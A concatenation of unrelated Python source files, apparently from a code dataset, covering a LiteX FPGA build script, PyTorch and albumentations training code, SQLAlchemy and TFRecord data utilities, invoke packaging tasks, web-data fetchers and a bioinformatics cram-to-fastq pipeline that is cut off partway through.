self.register_mem("emulator_ram", self.mem_map["emulator_ram"], self.emulator_ram.bus, 0x4000)
# spiflash
spiflash_pads = self.platform.request("spiflash4x")
spiflash_pads.clk = Signal()
self.specials += Instance("STARTUPE2",
i_CLK=0,
i_GSR=0,
i_GTS=0,
i_KEYCLEARB=0,
i_PACK=0,
i_USRCCLKO=spiflash_pads.clk,
i_USRCCLKTS=0,
i_USRDONEO=1,
i_USRDONETS=1)
self.submodules.spiflash = SpiFlash(
spiflash_pads,
dummy=11,
div=2,
endianness=self.cpu.endianness)
self.add_wb_slave(mem_decoder(self.mem_map["spiflash"]), self.spiflash.bus)
self.add_memory_region("spiflash", self.mem_map["spiflash"] | self.shadow_base, 0x1000000)
self.add_constant("FLASHBOOT_LINUX_VEXRISCV", None)
self.add_constant("FLASH_BOOT_ADDRESS", None)
# Build / Load / Flash -----------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="Linux on LiteX-VexRiscv")
parser.add_argument("--build", action="store_true", help="build bitstream")
parser.add_argument("--load", action="store_true", help="load bitstream (SRAM)")
parser.add_argument("--flash", action="store_true", help="flash bitstream (SPI Flash)")
args = parser.parse_args()
if args.build:
soc = LinuxSoC()
builder = Builder(soc, output_dir="build")
builder.build()
if args.load:
from litex.build.openocd import OpenOCD
prog = OpenOCD("openocd/openocd_xilinx.cfg")
prog.load_bitstream("build/gateware/top.bit")
if args.flash:
flash_regions = {
"build/gateware/top.bin": "0x00000000", # FPGA image: automatically loaded at startup
"binaries/Image": "0x00400000", # Linux Image: copied to 0xc0000000 by bios
"binaries/rootfs.cpio": "0x00800000", # File System: copied to 0xc2000000 by bios
"binaries/rv32.dtb": "0x00f00000", # Device tree: copied to 0xc3000000 by bios
"emulator/emulator.bin": "0x00f80000", # MM Emulator: copied to 0x20000000 by bios
}
from litex.build.openocd import OpenOCD
prog = OpenOCD("openocd/openocd_xilinx.cfg",
flash_proxy_basename="openocd/bscan_spi_xc7a35t.bit")
prog.set_flash_proxy_dir(".")
for filename, base in flash_regions.items():
base = int(base, 16)
print("Flashing {} at 0x{:08x}".format(filename, base))
prog.flash(base, filename)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3230380 | <filename>models/conv.py<gh_stars>10-100
import torch
from layers import Conv2d, Linear
class ConvModel(torch.nn.Module):
def __init__(self, in_channels: int, out_channels: int, dropout: bool = True):
super().__init__()
self.features = torch.nn.Sequential(
Conv2d(in_channels, 32, 3, padding=1),
torch.nn.ReLU(),
torch.nn.MaxPool2d(2),
Conv2d(32, 64, 3, padding=1),
torch.nn.ReLU(),
torch.nn.MaxPool2d(2),
Conv2d(64, 128, 3, padding=1),
torch.nn.Dropout(0.25 if dropout else 0.0),
torch.nn.ReLU(),
torch.nn.MaxPool2d(2),
Conv2d(128, 256, 3, padding=1),
torch.nn.ReLU(),
torch.nn.Dropout(0.5 if dropout else 0.0)
)
# Certain neurons play a crucial role
self.out_layer = Linear(256, out_channels)
def __call__(self, inp: torch.Tensor) -> torch.Tensor:
return self.out_layer(self.features(inp).mean(dim=(2,3))) | StarcoderdataPython |
3373824 | from tests.base import BaseTestCase
from nose.plugins.attrib import attr
from shiftevent.event import Event
from shiftevent.handlers import Dummy1
@attr('event', 'handler', 'dummy1')
class Dummy1Test(BaseTestCase):
def test_instantiating_handler(self):
""" Instantiating dummy1 handler """
handler = Dummy1()
self.assertIsInstance(handler, Dummy1)
def test_handle_event(self):
""" Handler Dummy1 handles event"""
handler = Dummy1()
event = Event(
type='DUMMY_EVENT',
payload={'prop': 'val'}
)
event = handler.handle(event)
self.assertIn('dummy_handler1', event.payload)
def test_rollback_event(self):
""" Handler Dummy1 rolling back an event """
handler = Dummy1()
event = Event(
type='DUMMY_EVENT',
payload={'prop': 'val'}
)
event = handler.handle(event)
self.assertIn('dummy_handler1', event.payload)
handler.rollback(event)
self.assertNotIn('dummy_handler1', event.payload)
| StarcoderdataPython |
1720652 | """tasks.py
Simple tutorial invoke based task execution tool for building debian package (rpm support in process...) of ip2w application.
Use [invoke.yaml] config file or cli params (see @task specification)
Usage:
invoke builddeb --no-use-git | --use-git (default)
"""
import os
import time
import tempfile as tmp
from pathlib import Path
from shutil import copyfile
from invoke import task, context, Collection, Config
from git import Repo # https://gitpython.readthedocs.io/en/stable/
def git_update_ctx(source: Path, ctx: context.Context):
"Update ctx from git"
repo = Repo(source)
head_commit = repo.head.commit
# repo_config = repo.config_reader()
ctx.update({
"project": {
"url": repo.remotes.origin.url, # git remote get-url origin
"name": repo.remotes.origin.url.rstrip('.git').rpartition("/")[-1], # git remote get-url origin | xargs basename -s .git
"version": str(head_commit), # GIT_VERSION="$(git rev-list HEAD -n 1)"
"branch": head_commit.name_rev.split(" ")[-1], # BRANCH="$(git name-rev --name-only HEAD)"
"updated_date": head_commit.committed_date,
"author": head_commit.author.name, # $(git config user.name) <$(git config user.email)>
"author_email": head_commit.author.email,
}
})
def path_resolve(path, default_path) -> Path:
"Resolve path. if [path] is None or empty then [default_path]."
return Path(path or default_path).expanduser().resolve()
def get_existing_dir(directory: Path) -> Path:
"Return existing directory, create if it doesn't exist (full path with parents)."
if not directory.exists():
directory.mkdir(parents = True, exist_ok=True)
return directory
@task(help={
"source": "Source directory",
"config": "Config directory",
"debian": "DEBIAN directory",
"output": "Output .deb directory",
"use_git": "Use git to get project info",
}, optional=['use_git'])
def build_deb(ctx, source = None, config = None, debian = None, output = None, use_git = None):
"Build .deb package."
source_path = ctx.config.deb.source = path_resolve(source, ctx.config.deb.source)
config_path = ctx.config.deb.config = path_resolve(config, ctx.config.deb.config)
debian_path = ctx.config.deb.debian = path_resolve(debian, ctx.config.deb.debian)
output_path = ctx.config.deb.output = path_resolve(output, ctx.config.deb.output)
use_git = use_git or bool(ctx.config.deb.get('use_git', 'false'))
if use_git:
git_update_ctx(source_path, ctx)
# todo: add templates support
with tmp.TemporaryDirectory() as tmp_dir:
build_root_dir = Path(tmp_dir) # / ctx.config.project.name
with ctx.cd(build_root_dir):
build_project_dir = get_existing_dir(build_root_dir / ctx.config.project.name)
ctx.run(f'cp -r "{debian_path}" "{build_project_dir}"')
with open(debian_path / 'conffiles') as c_f:
conffiles = c_f.read()
files_to = dict((os.path.basename(file), build_project_dir.joinpath(file.lstrip("/"))) for file in conffiles.split())
files_from = dict((file.name, file) for src in [source_path, config_path] for file in src.iterdir() if file.is_file())
for file_name in files_from.keys() & files_to.keys():
files_to[file_name].parent.mkdir(parents=True, exist_ok=True)
copyfile(files_from[file_name], files_to[file_name])
deb_file = output_path / f'{ctx.config.project.name}-{ctx.config.project.version}.deb'
ctx.run(f"fakeroot dpkg -b ./{ctx.config.project.name} {deb_file}")
ctx.run("tree")
class SafeDict(dict):
"SafeDict to use in str.format_map"
def __missing__(self, key):
return '{' + key + '}'
def process_run_ctx(ctx, run_ctx):
""" Process run context as following:
working_dir: <working directory>
params:
param-name: <param-value>
...
run: [cmd list]
"""
working_dir = run_ctx.get("working_dir", os.getcwd())
with ctx.cd(working_dir):
ctx.run("pwd")
for run_cmd in run_ctx.get("run", []):
print(run_cmd.format_map(SafeDict(**run_ctx.get("params",{}))))
ctx.run(run_cmd.format_map(SafeDict(**run_ctx.get("params",{}))), echo=True, warn=True)
@task()
def build_rpm(ctx):
"Run ctx = ctx.rpm"
process_run_ctx(ctx, ctx.rpm)
@task()
def docker_build(ctx, target):
"Run ctx = ctx.docker.build[target]"
process_run_ctx(ctx, ctx.docker.build[target])
@task()
def docker_run(ctx, target):
"Run ctx = ctx.docker.run[target]"
process_run_ctx(ctx, ctx.docker.run[target])
@task()
def run_tests(ctx, target):
"Run ctx = ctx.tests[target]"
process_run_ctx(ctx, ctx.tests[target])
tasks_dir = os.path.dirname(__file__)
ns = Collection(build_deb, build_rpm, docker_build, docker_run, run_tests)
default_config = Config(defaults={
"run": {"pty": True},
"deb": {
'use_git': False,
'source': tasks_dir,
'config': os.path.join(tasks_dir, "builddeb", "config"),
'debian': os.path.join(tasks_dir, "builddeb", "DEBIAN"),
'output': os.path.join(tasks_dir, "builddeb")
},
"project": {
'name': "<project-name>",
'version': "<project-version",
'branch': "<project-branch>",
'updated_date': int(time.time()),
'author': "<project-author>",
'author_email': "<project-author>-email",
},
})
ns.configure(default_config)
| StarcoderdataPython |
157097 | from sqlalchemy import (
Column,
String,
DateTime
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql import func
from spendy.db.utils import get_db_engine
Base = declarative_base()
class BankAccount(Base):
__tablename__ = 'bank_accounts'
id = Column(String(50), primary_key=True)
bank = Column(String(50))
owner = Column(String(50))
type = Column(String(50))
description = Column(String(100))
ledger_account = Column(String(100))
process_ts = Column(
DateTime(timezone=True),
server_default=func.now(),
onupdate=func.now()
)
def __repr__(self):
return f"<BankAccount(bank='{self.bank}', owner='{self.owner}', type={self.type})>"
if __name__ == "__main__":
db_engine = get_db_engine()
Base.metadata.create_all(db_engine)
| StarcoderdataPython |
1781132 | # scopus_fulltext_spider.py
import json
import logging
import typing as tg
import os
from ..dependencies.elsapy.elsdoc import FullDoc
from ..dependencies.elsapy.elsclient import ElsClient
class ScopusFulltextSpider:
'''通过调用Elsevier的全文API检索指定doi的全文。
全文结果将以xml格式储存在output_path目录下。'''
def __init__(
self, doi: str,
filename=None,
output_path='./data/Scopus/',
config='./data_fetcher/scopus/config.json',
log_file='./data/ieee_fulltext_spider_log.txt'
) -> None:
# 初始化类
con_file = open(config)
config = json.load(con_file)
con_file.close()
self._client = ElsClient(config['apikey'])
self._client.inst_token = config['insttoken']
self.doi = doi
self.doc = FullDoc(doi=doi)
self.output_path = output_path
if self.output_path[-1] not in ['/', '\\']:
self.output_path += '/'
self.filename = filename
if self.filename is None:
self.filename = doi.replace('/', '_').replace('\\', '_') + '.json'
# 爬取失败时记录日志。
self._logger = logging.getLogger()
self._logger.setLevel(logging.WARNING)
format_str = logging.Formatter('%(asctime)s - %(filename)s - %(levelname)s: %(message)s')
fh = logging.FileHandler(filename=log_file)
fh.setFormatter(format_str)
self._logger.addHandler(fh)
def execute(self) -> tg.Optional[str]:
'''根据doi执行对全文获取API的调用。
如果获取成功,就将结果写入指定文件夹指定的文件名内,返回全文的文件路径
如果获取失败,记录日志并返回None。
'''
succ = self.doc.read(els_client=self._client)
if succ:
# 成功找到原文,将检索结果保存至文件夹中
if not os.path.exists(self.output_path):
os.makedirs(self.output_path)
with open(self.output_path + self.filename, 'w', encoding='utf-8') as f:
f.write(str(self.doc.data))
return self.output_path + self.filename
err_msg = self.doc.err_msg
self._logger.error('ScopusFulltextSpider, getting doi = %s failed. Exception: %s', self.doi, str(err_msg))
return None
| StarcoderdataPython |
3244563 | # AUTOGENERATED! DO NOT EDIT! File to edit: 04_data.ipynb (unless otherwise specified).
__all__ = ['open_tif', 'MSTensorImage', 'BAND_STATS', 'bands', 'means', 'stds', 'Channelcopy', 'Channelaug',
'TrainTransform', 'ValTransform', 'trainaug', 'globalaug1', 'globalaug2', 'locaaug', 'val_pipe', 'aug',
'aug2', 'db']
# Cell
from fastai.vision.all import *
import skimage.io as skio
import warnings
warnings.filterwarnings("ignore")
import SSLRS.utils as utils
# Cell
def open_tif(fn, cls=torch.Tensor):
im = skio.imread(str(fn))/10000
im = im.transpose(1,2,0).astype('float32')
return im
class MSTensorImage(TensorImage):
@classmethod
def create(cls, data:(Path,str,ndarray), chnls=None):
if isinstance(data, Path) or isinstance(data, str):
if str(data).endswith('tif'): im = open_tif(fn=data,cls=torch.Tensor)
elif isinstance(data, ndarray):
im = torch.from_numpy(data)
else:
im = data
return im
# Cell
BAND_STATS = {
'S2':{
'mean': {
'B01': 340.76769064,
'B02': 429.9430203,
'B03': 614.21682446,
'B04': 590.23569706,
'B05': 950.68368468,
'B06': 1792.46290469,
'B07': 2075.46795189,
'B08': 2218.94553375,
'B8A': 2266.46036911,
'B09': 2246.0605464,
'B11': 1594.42694882,
'B12': 1009.32729131
},
'std': {
'B01': 554.81258967,
'B02': 572.41639287,
'B03': 582.87945694,
'B04': 675.88746967,
'B05': 729.89827633,
'B06': 1096.01480586,
'B07': 1273.45393088,
'B08': 1365.45589904,
'B8A': 1356.13789355,
'B09': 1302.3292881,
'B11': 1079.19066363,
'B12': 818.86747235
}
},
'S1': {
'mean': {
'VV': -12.619993741972035,
'VH': -19.29044597721542,
'VV/VH': 0.6525036195871579,
},
'std': {
'VV': 5.115911777546365,
'VH': 5.464428464912864,
'VV/VH': 30.75264076801808,
},
'min': {
'VV': -74.33214569091797,
'VH': -75.11137390136719,
'R': 3.21E-2
},
'max': {
'VV': 34.60696029663086,
'VH': 33.59768295288086,
'R': 1.08
}
}
}
# Cell
bands=['B02','B03', 'B04', 'B05','B06', 'B07', 'B11', 'B08','B8A', 'B12']
means=[BAND_STATS['S2']['mean'][band]/10000 for band in bands]
stds=[BAND_STATS['S2']['std'][band]/10000 for band in bands]
# Cell
import albumentations as A
from albumentations.pytorch import ToTensorV2
from torchvision import transforms
from albumentations.core.transforms_interface import ImageOnlyTransform
import random
import cv2
class Channelcopy(ImageOnlyTransform):
def __init__(self, always_apply=False, p=0.5):
super(Channelaug, self).__init__(always_apply, p)
def apply(self, img, **params):
temp=img[:,:,random.randint(0,9),np.newaxis]
return np.repeat(temp,10,axis=2)
class Channelaug(ImageOnlyTransform):
def __init__(self, always_apply=False, p=0.5):
super(Channelaug, self).__init__(always_apply, p)
def apply(self, img, **params):
result_img = np.empty_like(img)
for i in range(10):
shift=random.uniform(-0.2,0.2)
result_img[..., i] = img[..., i] + shift
result_img[result_img>1]=1
return result_img
trainaug=[]
# first gobal crop
globalaug1 = A.Compose([Channelaug(p=0.2),A.HorizontalFlip(p=0.5),
A.ShiftScaleRotate(p=.5),
A.RandomResizedCrop(120,120,scale=(0.4, 1.),always_apply=True),
A.GaussianBlur(p=1.0),
# A.Solarize(threshold=0.5),
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
# second global crop
globalaug2 = A.Compose([Channelaug(p=0.2),A.HorizontalFlip(p=0.5),
A.ShiftScaleRotate(p=.5),
A.RandomResizedCrop(120,120,scale=(0.4, 1.),always_apply=True),
A.GaussianBlur(p=0.1),
A.Solarize(threshold=0.5,p=0.2),
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
# transformation for the local small crops
locaaug = A.Compose([Channelaug(p=0.2),A.HorizontalFlip(p=0.5),
A.ShiftScaleRotate(p=.5),
A.RandomResizedCrop(56,56,scale=(0.05, 0.4),always_apply=True),
A.GaussianBlur(p=0.5),
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
trainaug.append(globalaug1)
trainaug.append(globalaug2)
for _ in range(6):
trainaug.append(locaaug)
val_pipe = A.Compose([
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
class TrainTransform(ItemTransform):
split_idx = 0
def __init__(self, aug,split=0):
self.aug = aug
# self.split_idx = split
def encodes(self, x):
result=[]
for i in range(len(self.aug)):
result.append(self.aug[i](image=x[0])['image'])
return result, x[1]
class ValTransform(ItemTransform):
split_idx = 1
def __init__(self, aug,split=0):
self.aug = aug
# self.split_idx = split
def encodes(self, x):
aug = self.aug(image=x[0])
# print(torch.cat((aug['image0'],aug['image1']),axis=0).shape)
return aug['image'], x[1]
# Create our class with this aug_pipe
aug = TrainTransform(trainaug)
aug2=ValTransform(val_pipe)
# Cell
db = DataBlock(blocks=(TransformBlock(type_tfms=partial(MSTensorImage.create)),CategoryBlock),
splitter=ColSplitter('Isval'),
get_x=ColReader('fname'),
get_y=ColReader('labels'),
item_tfms=[aug,aug2]
) | StarcoderdataPython |
134367 | __all__ = ['controle', 'modelo', 'view_ui'] | StarcoderdataPython |
3349147 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import datetime as DT
import json
from pathlib import Path
import shutil
import sys
sys.path.append('..')
sys.path.append('../genre_translate_file')
from db import Dump
from load import load
from common_utils import get_logger
from common import get_current_datetime_str
log = get_logger('generate_games.txt')
DIR = Path(__file__).parent.resolve()
FILE_NAME_GAMES = DIR / 'game_by_genres.json'
FILE_NAME_BACKUP = DIR / 'backup'
FILE_NAME_BACKUP.mkdir(parents=True, exist_ok=True)
# Example: "Action", "Adventure" -> "Action-adventure"
GENRE_COMPRESSION = [
("Action", "Adventure", "Action-adventure"),
("Action", "RPG", "Action/RPG"),
("First-person", "Shooter", "FPS"),
("Survival", "Horror", "Survival horror"),
]
def do_genres_compression(genres: list) -> list:
genres = sorted(set(genres))
to_remove = set()
for src_1, src_2, target in GENRE_COMPRESSION:
if src_1 in genres and src_2 in genres:
to_remove.add(src_1)
to_remove.add(src_2)
genres.append(target)
log.info(f'Compress genres {src_1!r} and {src_2!r} -> {target!r}')
for x in to_remove:
genres.remove(x)
return sorted(set(genres))
log.info('Start.')
if FILE_NAME_GAMES.exists():
backup_file_name = str(
FILE_NAME_BACKUP / f'{get_current_datetime_str()}_{FILE_NAME_GAMES.name}'
)
shutil.copy(
FILE_NAME_GAMES,
backup_file_name
)
log.info(f'Save backup to: {backup_file_name}')
log.info('')
log.info('Loading cache...')
game_by_genres = load(FILE_NAME_GAMES)
log.info(f'game_by_genres ({len(game_by_genres)})')
new_game_by_genres = Dump.dump()
log.info(f'new_game_by_genres ({len(new_game_by_genres)})')
genre_translate = load()
log.info(f'genre_translate ({len(genre_translate)})')
log.info('Finish loading cache.')
log.info('')
log.info('Search games...')
number = 0
for game, genres in new_game_by_genres.items():
if game in game_by_genres:
continue
log.info(f'Added game {game!r} with genres: {genres}')
number += 1
new_genres = []
for x in genres:
tr_genres = genre_translate.get(x)
if not tr_genres: # null, [], ""
continue
if isinstance(tr_genres, str):
new_genres.append(tr_genres)
elif isinstance(tr_genres, list):
new_genres.extend(tr_genres)
else:
log.warning(f'Unsupported type genres {tr_genres} from {x!r}')
new_genres = do_genres_compression(new_genres)
log.info(f'Successful translate genres: {genres} -> {new_genres}')
game_by_genres[game] = new_genres
log.info('')
log.info(f'Finish search games. New games: {number}.')
log.info(f'Saving to {FILE_NAME_GAMES}')
json.dump(
game_by_genres,
open(FILE_NAME_GAMES, 'w', encoding='utf-8'),
ensure_ascii=False,
indent=4
)
log.info('Finish!')
| StarcoderdataPython |
1669558 | <filename>setup.py
#!/usr/bin/pythoni
from setuptools import setup, find_packages
from os import path
p = path.abspath(path.dirname(__file__))
with open(path.join(p, 'README.rst')) as f:
README = f.read()
setup(
name='paywix',
version='1.4.0',
author="<NAME>",
author_email="<EMAIL>",
description='Paywix is a light weight payment processing sdk for python based applications.',
long_description=README,
long_description_content_type='text/markdown',
install_requires=[
'requests'
],
url='https://github.com/renjithsraj/paywix',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
download_url='',
packages=find_packages(),
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3 :: Only',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
keywords='payment processing, payu, python payment gateway wrapper, cashfree, paytm, etc',
)
| StarcoderdataPython |
129983 | <gh_stars>0
import psycopg2
import tensorflow as tf
import logging
from src.config import predict_categories, label_name, feature_names
class Db2Tfrecord:
def query_db(self):
raise NotImplementedError
def format_data(self):
raise NotImplementedError
def write2tfrecord(self):
raise NotImplementedError
class PostgreSQL2Tfrecord(Db2Tfrecord):
"""Query data from PostgreSQL and write to tfrecord file."""
def query_db(self):
"""Query data from PostgreSQL"""
try:
conn = psycopg2.connect(
database="database",
user="user",
password="password",
host="localhost",
port="5432")
cur = conn.cursor()
cur.execute("select * from IRIS")
rows = cur.fetchall()
data = {}
data["sepal_length"] = []
data["sepal_width"] = []
data["petal_length"] = []
data["petal_width"] = []
data["variety"] = []
for row in rows:
data["sepal_length"].append(row[1])
data["sepal_width"].append(row[2])
data["petal_length"].append(row[3])
data["petal_width"].append(row[4])
data["variety"].append(row[5])
conn.commit()
conn.close()
except Exception as e:
logging.error("Can not query from db: {}".format(e))
return 0
return data
def format_data(self, data):
"""Format the query data from the PostgreSQL"""
data[label_name] = list(
map(lambda x: predict_categories.index(x), data["variety"]))
data[label_name] = tf.keras.utils.to_categorical(data[label_name])
return data
def write2tfrecord(self, data, filename):
"""Write the formated data into tfrecord file."""
with tf.io.TFRecordWriter(filename) as writer:
for i in range(len(data[list(data.keys())[0]])):
feature = {
"sepal_length": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["sepal_length"][i]])),
"sepal_width": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["sepal_width"][i]])),
"petal_length": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["petal_length"][i]])),
"petal_width": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["petal_width"][i]])),
"variety": tf.train.Feature(
float_list=tf.train.FloatList(
value=data["variety"][i]))
}
example_proto = tf.train.Example(
features=tf.train.Features(feature=feature))
example = example_proto.SerializeToString()
writer.write(example)
class Pipeline:
"""Load the data from tfrecords.
Attributes:
tfrecords_filenames: tfrecord file names in list
"""
def __init__(self, tfrecords_filenames):
"""Init Pipeline with tfrecords_filenames"""
self.features = {
"sepal_length": tf.io.FixedLenFeature([], tf.float32),
"sepal_width": tf.io.FixedLenFeature([], tf.float32),
"petal_length": tf.io.FixedLenFeature([], tf.float32),
"petal_width": tf.io.FixedLenFeature([], tf.float32),
"variety": tf.io.FixedLenFeature((3), tf.float32)
}
full_dataset = tf.data.TFRecordDataset(tfrecords_filenames)
data_size = 0
for _ in full_dataset:
data_size += 1
self.data_size = data_size
train_size = int(0.7 * data_size)
test_size = int(0.15 * data_size)
self.train_size = train_size
full_dataset = full_dataset.shuffle(buffer_size=1)
full_dataset = full_dataset.map(self.parse_data)
self.train_dataset = full_dataset.take(train_size)
self.test_dataset = full_dataset.skip(train_size)
self.val_dataset = self.test_dataset.skip(test_size)
self.test_dataset = self.test_dataset.take(test_size)
def parse_data(self, serialized):
"""Format tfrecord data.
Args:
serialized: The record in the tfrecord.
Returns:
Formated record.
"""
parsed_example = tf.io.parse_example(serialized, self.features)
inputs = {}
for key in parsed_example.keys():
if key in feature_names:
inputs[key] = parsed_example[key]
return (inputs, {label_name: parsed_example[label_name]})
def get_train_data(self, batch_size):
return self.train_dataset.batch(batch_size)
def get_val_data(self, batch_size):
return self.val_dataset.batch(batch_size)
def get_test_data(self, batch_size):
return self.test_dataset.batch(batch_size)
| StarcoderdataPython |
3338010 | <reponame>vinwerill/vinwerill-22
# 高雄市公有路外停車場一覽表
import sys
import urllib.request
import json
import csv
def fetch(query_limit):
# 指定查詢筆數上限
url = 'https://ws.kinmen.gov.tw/001/Upload/0/relfile/0/0/92b4584c-f454-4bd5-a75f-818dcf901f32.json'
req = urllib.request.urlopen(url)
# 確認資料庫編碼 (utf-8)
charset = req.info().get_content_charset()
# print('資料庫編碼:', charset)
# response_data = req.read().decode(charset)
response_data = req.read()
# 全部資料
json_data = json.loads(response_data)
if query_limit==0:
return json_data[:len(json_data)+1]
return json_data[:query_limit]
if __name__ == '__main__':
qlimit = int(input('設定查詢筆數 (0.all | -1.quit): '))
if qlimit == -1:
sys.exit()
json_data = fetch(qlimit)
print(json.dumps(json_data, sort_keys=True, indent=4), file=open('kinmen_tourist_spot.json', 'wt'))
print('Quantity:')
for col in json_data:
print(col['CName']+':'+col['CAdd'])
# encoding='utf8'
# newline=''
kinmen_tourist_spot_data = json_data
with open('kinmen_tourist_spot.csv', 'w', newline='', encoding='utf8') as kinmen_tourist_spot_csv:
# 資料寫入檔案
csvwriter = csv.writer(kinmen_tourist_spot_csv)
count = 0
for row in kinmen_tourist_spot_data:
if count == 0:
header = row.keys()
csvwriter.writerow(header)
count += 1
csvwriter.writerow(row.values())
print('\n'+'資料筆數:', count)
| StarcoderdataPython |
1708059 | ##############################################################################
#
# Kennedy Institute of Rheumatology
#
# $Id$
#
# Copyright (C) 2015 <NAME>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
###############################################################################
"""
===========================
Pipeline cram2fastq
===========================
:Author: <NAME>
:Release: $Id$
:Date: |today|
:Tags: Python
Overview
========
This pipeline coverts Sanger CRAM files to fastq.gz,
optionally quality trimming and reconciling the fastq files
Usage
=====
See :ref:`PipelineSettingUp` and :ref:`PipelineRunning` on general
information how to use CGAT pipelines.
Configuration
-------------
The pipeline requires a configured :file:`pipeline.ini` file.
CGATReport report requires a :file:`conf.py` and optionally a
:file:`cgatreport.ini` file (see :ref:`PipelineReporting`).
Default configuration files can be generated by executing:
python <srcdir>/pipeline_cram2fastq.py config
Input files
-----------
Requirements
------------
On top of the default CGAT setup, the pipeline requires the following
software to be in the path:
.. Add any additional external requirements such as 3rd party software
or R modules below:
Requirements:
* samtools >= 1.1
Pipeline output
===============
Glossary
========
Code
====
"""
from ruffus import *
import sys
import os
import glob
import sqlite3
from CGATCore import Experiment as E
from CGATCore import Pipeline as P
from CGATCore import Database as DB
import pysam
# -------------------------- < parse parameters > --------------------------- #
# load options from the config file
PARAMS = P.get_parameters(
["%s/pipeline.yml" % os.path.splitext(__file__)[0],
"../pipeline.yml",
"pipeline.yml"])
# ----------------------- < pipeline configuration > ------------------------ #
if len(sys.argv) > 1:
if(sys.argv[1] == "config") and __name__ == "__main__":
sys.exit(P.main(sys.argv))
# ------------------------< specific pipeline tasks >------------------------ #
@follows(mkdir("validate.cram.dir"))
@transform(glob.glob("data.dir/*.cram"),
regex(r".*/(.*).cram"),
[r"validate.cram.dir/\1.validate", r"validate.cram.dir/\1.quality"])
def validateCramFiles(infile, outfiles):
'''Validate CRAM files by exit status of
cramtools qstat. Save the quality scores of cram files.
'''
outfile, outfile_quality = outfiles
statement = '''temp_quality=`mktemp -p %(cluster_tmpdir)s`;
cramtools qstat -I %(infile)s > $temp_quality;
echo $? > %(outfile)s;
cat $temp_quality
| awk '{OFS="\\t"} {print $1,$2}'
> %(outfile_quality)s;
rm $temp_quality;
'''
P.run(statement)
@follows(validateCramFiles)
@merge(validateCramFiles,
"validate.cram.dir/summary.txt")
def inspectValidations(infiles, outfile):
'''Check that all crams pass validation or
raise an Error.'''
validation_files = [fn
for filenames in infiles
for fn in filenames
if fn.endswith(".validate")]
outfile_handle = open(outfile, "w")
exit_states = []
for validation_file in validation_files:
with open(validation_file, "r") as vf_handle:
exit_status = vf_handle.read().strip("\n")
exit_states.append(int(exit_status))
outfile_handle.write("\t".join([validation_file, exit_status])+"\n")
outfile_handle.close()
if sum(exit_states) != 0:
raise ValueError("One or more cram files failed validation")
@follows(validateCramFiles)
@merge(validateCramFiles,
"validate.cram.dir/cram_quality.load")
def loadCramQuality(infiles, outfile):
''' Load the quality scores for the different cells
into the database (summarized table).
'''
quality_files = [fn
for filenames in infiles
for fn in filenames
if fn.endswith(".quality")]
P.concatenate_and_load(quality_files, outfile,
regex_filename="validate.cram.dir/(.*).quality",
cat="track",
has_titles=False,
header="cramID,number_reads,cram_quality_score")
@follows(inspectValidations,
mkdir("cell.info.dir"))
@merge(glob.glob("data.dir/*.cram"),
"cell.info.dir/cells.txt")
def extractSampleInformation(infiles, outfile):
'''Make a table of cells and corresponding cram files'''
# build a dictionary of cell to cram file mappings
cells = {}
for cram_file in infiles:
cram = pysam.AlignmentFile(cram_file, "rc")
print(cram.header)
cell = cram.header["RG"][0]["SM"]
if cell not in cells.keys():
cells[cell] = [cram_file]
else:
cells[cell].append(cram_file)
cram.close()
# write out a per-cell list of cram files
outdir = os.path.dirname(outfile)
outfile_handle = open(outfile, "w")
outfile_handle.write("#cell\tcram_files\n")
for cell in cells.keys():
outfile_handle.write("\t".join([cell, ",".join(cells[cell])])+"\n")
outfile_handle.close()
@split(extractSampleInformation,
"cell.info.dir/*.cell")
def cellCramLists(infile, outfiles):
'''Make a per-cell file containing the cram file(s)
corresponding to the cell'''
out_dir = os.path.dirname(infile)
with open(infile, "r") as cell_list:
for record in cell_list:
if record.startswith("#"):
continue
cell, cram_list = record.strip("\n").split("\t")
crams = cram_list.split(",")
cell_outfile_name = os.path.join(out_dir, cell+".cell")
with open(cell_outfile_name, "w") as cell_file_handle:
for cram in crams:
cell_file_handle.write(cram+"\n")
@follows(mkdir("fastq.dir"),
mkdir("fastq.temp.dir"),
extractSampleInformation)
@transform(cellCramLists,
regex(r".*/(.*).cell"),
(r"fastq.dir/\1.fastq.1.gz",
r"fastq.dir/\1.fastq.2.gz"))
def cram2fastq(infile, outfiles):
'''Convert Sanger CRAM files to Fastq format
Takes care of merging, quality trimming
and pair reconciliation.
Intermediate files are not kept by default.'''
# TODO: make quality trimming optional.
###################################
# set variables and open a log file
###################################
cell_name = os.path.basename(infile)[:-len(".cell")]
out_dir = os.path.dirname(outfiles[0])
temp_dir = "fastq.temp.dir"
log_file = os.path.join(temp_dir,
cell_name + ".fastq.extraction.log")
log = open(log_file, "w")
log.write("Fastq extraction log file for %(infile)s\n\n")
def _merge_dicts(a, b):
x = a.copy()
x.update(b)
return(x)
temp_files = []
# ##############################################
# Extract per-end Fastq(s) from the cram file(s)
# ##############################################
raw_fastq_names = []
with open(infile, "rb") as cram_files:
for line in cram_files:
cram = line.strip()
